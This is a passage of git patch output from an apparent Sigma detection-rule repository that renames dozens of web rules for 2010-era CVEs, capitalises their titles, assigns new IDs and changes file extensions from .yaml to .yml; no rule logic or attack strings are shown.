b/rules/web/web_cve-2010-1657_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1657 exploitation attempt -id: c32f0956-77ec-4875-8c3b-a84836f489a2 +title: CVE-2010-1657 Exploitation Attempt +id: adf6f8fb-fe7f-4dc2-af06-7f8885c5e9e9 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1659.yaml b/rules/web/web_cve-2010-1659_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1659.yaml rename to rules/web/web_cve-2010-1659_exploitation_attempt.yaml index 89c97e04..dd7a2a06 100644 --- a/rules/web/web_cve-2010-1659.yaml +++ b/rules/web/web_cve-2010-1659_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1659 exploitation attempt -id: 10697a46-85ff-499d-8bc5-7b6219da594a +title: CVE-2010-1659 Exploitation Attempt +id: bad7c462-464c-4471-8b46-309f295c5f09 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1714.yaml b/rules/web/web_cve-2010-1714_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-1714.yaml rename to rules/web/web_cve-2010-1714_exploitation_attempt.yaml index dca273b2..6c99e6f8 100644 --- a/rules/web/web_cve-2010-1714.yaml +++ b/rules/web/web_cve-2010-1714_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1714 exploitation attempt -id: c754acbf-a0ce-4df6-843e-fb1c55af5373 +title: CVE-2010-1714 Exploitation Attempt +id: 3d08c7e5-c55f-48e9-90d9-5abfd04e59f0 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1717.yaml b/rules/web/web_cve-2010-1717_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1717.yaml rename to rules/web/web_cve-2010-1717_exploitation_attempt.yaml index 992d7d40..20749f73 100644 --- a/rules/web/web_cve-2010-1717.yaml +++ b/rules/web/web_cve-2010-1717_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1717 exploitation attempt -id: 54c142a2-27af-4786-a191-12c76398e63f +title: CVE-2010-1717 Exploitation Attempt +id: d86b7f81-416b-41e1-81d8-d8b0ce291879 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1718.yaml b/rules/web/web_cve-2010-1718_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1718.yaml rename to rules/web/web_cve-2010-1718_exploitation_attempt.yaml index b9306420..c18702c4 100644 --- a/rules/web/web_cve-2010-1718.yaml +++ b/rules/web/web_cve-2010-1718_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1718 exploitation attempt -id: 706f8907-5d0a-41db-b93f-f0ee343300b6 +title: CVE-2010-1718 Exploitation Attempt +id: be0a91f3-44af-423b-ac25-21cac3719194 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1719.yaml b/rules/web/web_cve-2010-1719_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1719.yaml rename to rules/web/web_cve-2010-1719_exploitation_attempt.yaml index f11417c4..ad0528de 100644 --- a/rules/web/web_cve-2010-1719.yaml +++ b/rules/web/web_cve-2010-1719_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1719 exploitation attempt -id: e11eeb05-00e2-4d00-a572-222e6fe5e716 +title: CVE-2010-1719 Exploitation Attempt +id: 7e6667ad-773d-430f-803e-b0434e1a18b0 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1722.yaml b/rules/web/web_cve-2010-1722_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1722.yaml rename to rules/web/web_cve-2010-1722_exploitation_attempt.yaml index 557f28d2..915152b4 100644 --- a/rules/web/web_cve-2010-1722.yaml +++ b/rules/web/web_cve-2010-1722_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1722 exploitation attempt -id: 850fafc1-3151-48b6-b25a-41c3543df57c +title: CVE-2010-1722 Exploitation Attempt +id: b6b08f77-dd85-43a1-aba7-2c5019de2cbb author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1875.yaml b/rules/web/web_cve-2010-1875_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1875.yaml rename to rules/web/web_cve-2010-1875_exploitation_attempt.yaml index 3a52358d..3327818d 100644 --- a/rules/web/web_cve-2010-1875.yaml +++ b/rules/web/web_cve-2010-1875_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1875 exploitation attempt -id: 335b7e25-03d9-40b9-9f3a-82fdfce99af1 +title: CVE-2010-1875 Exploitation Attempt +id: dd496a1a-4d1a-466b-961a-c5ec583d9c2a author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1953.yaml b/rules/web/web_cve-2010-1953_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1953.yaml rename to rules/web/web_cve-2010-1953_exploitation_attempt.yaml index 20e8f0b7..44324f9c 100644 --- a/rules/web/web_cve-2010-1953.yaml +++ b/rules/web/web_cve-2010-1953_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1953 exploitation attempt -id: 72936897-8824-4fa8-9ecf-dbbc5f19e53a +title: CVE-2010-1953 Exploitation Attempt +id: 57d8ec13-203c-41fd-ab1f-1faae9b50704 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1954.yaml b/rules/web/web_cve-2010-1954_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1954.yaml rename to rules/web/web_cve-2010-1954_exploitation_attempt.yaml index 30ecafe1..b8a24efb 100644 --- a/rules/web/web_cve-2010-1954.yaml +++ b/rules/web/web_cve-2010-1954_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1954 exploitation attempt -id: 0159a66f-50f9-4485-b681-756fa2d16ce8 +title: CVE-2010-1954 Exploitation Attempt +id: 75db8c01-6053-40f5-bde9-3eb9b58c6993 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1955.yaml b/rules/web/web_cve-2010-1955_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1955.yaml rename to rules/web/web_cve-2010-1955_exploitation_attempt.yaml index f4c424f8..5d45ec58 100644 --- a/rules/web/web_cve-2010-1955.yaml +++ b/rules/web/web_cve-2010-1955_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1955 exploitation attempt -id: 9a0064ff-3544-4130-aaec-a8547645f44d +title: CVE-2010-1955 Exploitation Attempt +id: c6c7a6f6-53ae-4dd9-b765-369572746618 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1956.yaml b/rules/web/web_cve-2010-1956_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1956.yaml rename to rules/web/web_cve-2010-1956_exploitation_attempt.yaml index 7d33c368..be22f9f4 100644 --- a/rules/web/web_cve-2010-1956.yaml +++ b/rules/web/web_cve-2010-1956_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1956 exploitation attempt -id: 87412ddd-24a7-4d25-98b7-1df572fcac16 +title: CVE-2010-1956 Exploitation Attempt +id: 45c57364-0925-43c7-8340-2a4a3d57d080 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1979.yaml b/rules/web/web_cve-2010-1979_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1979.yaml rename to rules/web/web_cve-2010-1979_exploitation_attempt.yaml index f91073b5..44b2760f 100644 --- a/rules/web/web_cve-2010-1979.yaml +++ b/rules/web/web_cve-2010-1979_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1979 exploitation attempt -id: c56ae44a-bf7b-4643-a2f8-6935f792684c +title: CVE-2010-1979 Exploitation Attempt +id: 26d368fb-6ba7-42c0-9fdd-cb704c9b5762 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1980.yaml b/rules/web/web_cve-2010-1980_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1980.yaml rename to rules/web/web_cve-2010-1980_exploitation_attempt.yaml index 26b19ee7..74f85631 100644 --- a/rules/web/web_cve-2010-1980.yaml +++ b/rules/web/web_cve-2010-1980_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1980 exploitation attempt -id: 33689775-59d1-4bb4-84e6-4c659819e740 +title: CVE-2010-1980 Exploitation Attempt +id: a3003789-08e5-43c3-bf3b-a41498b626be author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1981.yaml b/rules/web/web_cve-2010-1981_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-1981.yaml rename to rules/web/web_cve-2010-1981_exploitation_attempt.yaml index fa7dba17..61351d14 100644 --- a/rules/web/web_cve-2010-1981.yaml +++ b/rules/web/web_cve-2010-1981_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1981 exploitation attempt -id: 7b1693c7-dfb2-4bc2-a100-8ff973053339 +title: CVE-2010-1981 Exploitation Attempt +id: 4819d179-2307-4d81-a96a-a6af63583c90 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1983.yaml b/rules/web/web_cve-2010-1983_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1983.yaml rename to rules/web/web_cve-2010-1983_exploitation_attempt.yaml index 7ba0e0c8..89e35f9f 100644 --- a/rules/web/web_cve-2010-1983.yaml +++ b/rules/web/web_cve-2010-1983_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1983 exploitation attempt -id: 1ccbc483-aa94-436c-ae2c-c0ff89c88950 +title: CVE-2010-1983 Exploitation Attempt +id: 34aeb1ba-e6a1-47d8-b705-89f21530c0bc author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-2033.yaml b/rules/web/web_cve-2010-2033_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-2033.yaml rename to rules/web/web_cve-2010-2033_exploitation_attempt.yaml index a12fc270..4d19b0ba 100644 --- a/rules/web/web_cve-2010-2033.yaml +++ b/rules/web/web_cve-2010-2033_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-2033 exploitation attempt -id: 5f65aa73-1a1f-44f6-9df4-2a593d83ca47 +title: CVE-2010-2033 Exploitation Attempt +id: 6fe83c91-50fa-4715-abeb-56db4494f0d6 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-2034.yaml b/rules/web/web_cve-2010-2034_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-2034.yaml rename to rules/web/web_cve-2010-2034_exploitation_attempt.yaml index 23959387..e4c6c576 100644 --- a/rules/web/web_cve-2010-2034.yaml +++ b/rules/web/web_cve-2010-2034_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-2034 exploitation attempt -id: fa7d6a2c-4fef-49cc-9b80-07edaa2687c2 +title: CVE-2010-2034 Exploitation Attempt +id: ac5d3e21-b01f-4bd3-b541-96107ca1a575 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-2035.yaml b/rules/web/web_cve-2010-2035_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-2035.yaml rename to rules/web/web_cve-2010-2035_exploitation_attempt.yaml index 37cd635f..5dc18fac 100644 --- a/rules/web/web_cve-2010-2035.yaml +++ b/rules/web/web_cve-2010-2035_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-2035 exploitation attempt -id: 517f9070-1bd8-4e24-ab39-17e41e353ab6 +title: CVE-2010-2035 Exploitation Attempt +id: a3d33778-c46a-4c7f-93d0-32fa6f44f216 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-2036.yaml b/rules/web/web_cve-2010-2036_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-2036.yaml rename to rules/web/web_cve-2010-2036_exploitation_attempt.yaml index 3f7221ee..213ad9a8 100644 --- a/rules/web/web_cve-2010-2036.yaml +++ b/rules/web/web_cve-2010-2036_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-2036 exploitation attempt -id: 99462979-ccf6-4c28-a108-fd2d958d39e0 +title: CVE-2010-2036 Exploitation Attempt +id: ab306706-061e-418d-bcda-f2350f713aa3 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-2122.yaml b/rules/web/web_cve-2010-2122_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-2122.yaml rename to rules/web/web_cve-2010-2122_exploitation_attempt.yaml index de75a78a..cbf7c4a1 100644 --- a/rules/web/web_cve-2010-2122.yaml +++ b/rules/web/web_cve-2010-2122_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-2122 exploitation attempt -id: 993b1828-3194-4686-87b6-14b893a2ac1e +title: CVE-2010-2122 Exploitation Attempt +id: 9c26c662-bd83-453c-bee6-af9ec135f0ed author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-2259.yaml b/rules/web/web_cve-2010-2259_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-2259.yaml rename to rules/web/web_cve-2010-2259_exploitation_attempt.yaml index fe81d09a..f270d25c 100644 --- a/rules/web/web_cve-2010-2259.yaml +++ b/rules/web/web_cve-2010-2259_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-2259 exploitation attempt -id: 12a63c52-1a42-437a-90cc-950a4cf6b3ab +title: CVE-2010-2259 Exploitation Attempt +id: 5122163e-68ae-4091-becc-1ce76da87818 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-2307.yaml b/rules/web/web_cve-2010-2307_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-2307.yaml rename to rules/web/web_cve-2010-2307_exploitation_attempt.yaml index e77c8288..aa36c44e 100644 --- a/rules/web/web_cve-2010-2307.yaml +++ b/rules/web/web_cve-2010-2307_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-2307 exploitation attempt -id: f2029a95-84dc-427f-a112-f5e373e791ff +title: CVE-2010-2307 Exploitation Attempt +id: 5ca51722-d5ab-4fd2-8019-d86ab7c4ab06 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-2682.yaml b/rules/web/web_cve-2010-2682_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-2682.yaml rename to rules/web/web_cve-2010-2682_exploitation_attempt.yaml index 6f88ea8d..e37ba64c 100644 --- a/rules/web/web_cve-2010-2682.yaml +++ b/rules/web/web_cve-2010-2682_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-2682 exploitation attempt -id: 93d57e84-a8e0-40c6-9d5f-679419117413 +title: CVE-2010-2682 Exploitation Attempt +id: 9523ed0f-8d29-43d2-ba03-80021ca432e9 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-2861.yaml b/rules/web/web_cve-2010-2861_exploitation_attempt.yaml similarity index 91% rename from rules/web/web_cve-2010-2861.yaml rename to rules/web/web_cve-2010-2861_exploitation_attempt.yaml index 8e1345f2..02c606e5 100644 --- a/rules/web/web_cve-2010-2861.yaml +++ b/rules/web/web_cve-2010-2861_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-2861 exploitation attempt -id: 51f51d47-b13c-4305-b017-f367e790e2cd +title: CVE-2010-2861 Exploitation Attempt +id: fe01aa56-4e1f-4a9e-8a91-a54ecb03337e author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-2920.yaml b/rules/web/web_cve-2010-2920_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-2920.yaml rename to rules/web/web_cve-2010-2920_exploitation_attempt.yaml index da22cf06..fcae4a86 100644 --- a/rules/web/web_cve-2010-2920.yaml +++ b/rules/web/web_cve-2010-2920_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-2920 exploitation attempt -id: e5195f58-f828-4ab2-a609-23eaaf46de44 +title: CVE-2010-2920 Exploitation Attempt +id: 06d7adfa-1797-499d-a070-afb10935ac16 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-3426.yaml b/rules/web/web_cve-2010-3426_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-3426.yaml rename to rules/web/web_cve-2010-3426_exploitation_attempt.yaml index 6bb330c8..a5571a8d 100644 --- a/rules/web/web_cve-2010-3426.yaml +++ b/rules/web/web_cve-2010-3426_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-3426 exploitation attempt -id: aa48eb4c-9028-4d0f-b6be-83f52bc805f7 +title: CVE-2010-3426 Exploitation Attempt +id: 2cb7c37d-e5a6-4dee-a34f-7b96ea217d5b author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-4231.yaml b/rules/web/web_cve-2010-4231_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-4231.yaml rename to rules/web/web_cve-2010-4231_exploitation_attempt.yaml index a0476b22..216b3351 100644 --- a/rules/web/web_cve-2010-4231.yaml +++ b/rules/web/web_cve-2010-4231_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-4231 exploitation attempt -id: c60db1d4-a919-4cbc-bcba-3271b2fd0e6b +title: CVE-2010-4231 Exploitation Attempt +id: dbf4c46f-5581-4cbd-8f31-7183bd7bc9eb author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-4617.yaml b/rules/web/web_cve-2010-4617_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-4617.yaml rename to rules/web/web_cve-2010-4617_exploitation_attempt.yaml index 33f2bc11..8664cee0 100644 --- a/rules/web/web_cve-2010-4617.yaml +++ b/rules/web/web_cve-2010-4617_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-4617 exploitation attempt -id: a7745670-2ad1-411a-8e6d-c43bc9942139 +title: CVE-2010-4617 Exploitation Attempt +id: 6e5bcbec-b693-4dc2-b093-38e07d0dd405 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-5278.yaml b/rules/web/web_cve-2010-5278_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-5278.yaml rename to rules/web/web_cve-2010-5278_exploitation_attempt.yaml index 14abd22d..9226d793 100644 --- a/rules/web/web_cve-2010-5278.yaml +++ b/rules/web/web_cve-2010-5278_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-5278 exploitation attempt -id: 37dbe173-d9f1-400b-862e-cceef489ef6f +title: CVE-2010-5278 Exploitation Attempt +id: 88280398-c4a7-498f-9652-86d2448418d1 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental From 276cb597567fa91dd9f5912bd753fd997911b692 Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Sun, 12 Sep 2021 18:41:56 +0530 Subject: [PATCH 0888/1367] yaml to yml ext --- ...on_attempt.yaml => web_cve-2010-0943_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-0944_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-0985_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1219_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1304_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1305_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1306_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1307_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1308_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1312_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1313_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1314_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1345_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1353_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1354_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1470_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1471_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1472_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1473_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1474_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1475_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1476_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1494_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1495_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1532_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1533_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1534_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1535_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1601_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1602_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1607_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1657_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1659_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1714_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1717_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1718_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1719_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1722_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1875_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1953_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1954_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1955_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1956_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1979_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1980_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1981_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-1983_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-2033_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-2034_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-2035_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-2036_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-2122_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-2259_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-2307_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-2682_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-2861_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-2920_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-3426_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-4231_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-4617_exploitation_attempt.yml} | 0 ...on_attempt.yaml => web_cve-2010-5278_exploitation_attempt.yml} | 0 61 files changed, 0 insertions(+), 0 deletions(-) rename rules/web/{web_cve-2010-0943_exploitation_attempt.yaml => web_cve-2010-0943_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-0944_exploitation_attempt.yaml => web_cve-2010-0944_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-0985_exploitation_attempt.yaml => web_cve-2010-0985_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1219_exploitation_attempt.yaml => web_cve-2010-1219_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1304_exploitation_attempt.yaml => web_cve-2010-1304_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1305_exploitation_attempt.yaml => web_cve-2010-1305_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1306_exploitation_attempt.yaml => web_cve-2010-1306_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1307_exploitation_attempt.yaml => web_cve-2010-1307_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1308_exploitation_attempt.yaml => web_cve-2010-1308_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1312_exploitation_attempt.yaml => web_cve-2010-1312_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1313_exploitation_attempt.yaml => web_cve-2010-1313_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1314_exploitation_attempt.yaml => web_cve-2010-1314_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1345_exploitation_attempt.yaml => web_cve-2010-1345_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1353_exploitation_attempt.yaml => web_cve-2010-1353_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1354_exploitation_attempt.yaml => web_cve-2010-1354_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1470_exploitation_attempt.yaml => web_cve-2010-1470_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1471_exploitation_attempt.yaml => web_cve-2010-1471_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1472_exploitation_attempt.yaml => web_cve-2010-1472_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1473_exploitation_attempt.yaml => web_cve-2010-1473_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1474_exploitation_attempt.yaml => web_cve-2010-1474_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1475_exploitation_attempt.yaml => web_cve-2010-1475_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1476_exploitation_attempt.yaml => web_cve-2010-1476_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1494_exploitation_attempt.yaml => web_cve-2010-1494_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1495_exploitation_attempt.yaml => web_cve-2010-1495_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1532_exploitation_attempt.yaml => web_cve-2010-1532_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1533_exploitation_attempt.yaml => web_cve-2010-1533_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1534_exploitation_attempt.yaml => web_cve-2010-1534_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1535_exploitation_attempt.yaml => web_cve-2010-1535_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1601_exploitation_attempt.yaml => web_cve-2010-1601_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1602_exploitation_attempt.yaml => web_cve-2010-1602_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1607_exploitation_attempt.yaml => web_cve-2010-1607_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1657_exploitation_attempt.yaml => web_cve-2010-1657_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1659_exploitation_attempt.yaml => web_cve-2010-1659_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1714_exploitation_attempt.yaml => web_cve-2010-1714_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1717_exploitation_attempt.yaml => web_cve-2010-1717_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1718_exploitation_attempt.yaml => web_cve-2010-1718_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1719_exploitation_attempt.yaml => web_cve-2010-1719_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1722_exploitation_attempt.yaml => web_cve-2010-1722_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1875_exploitation_attempt.yaml => web_cve-2010-1875_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1953_exploitation_attempt.yaml => web_cve-2010-1953_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1954_exploitation_attempt.yaml => web_cve-2010-1954_exploitation_attempt.yml} (100%) rename 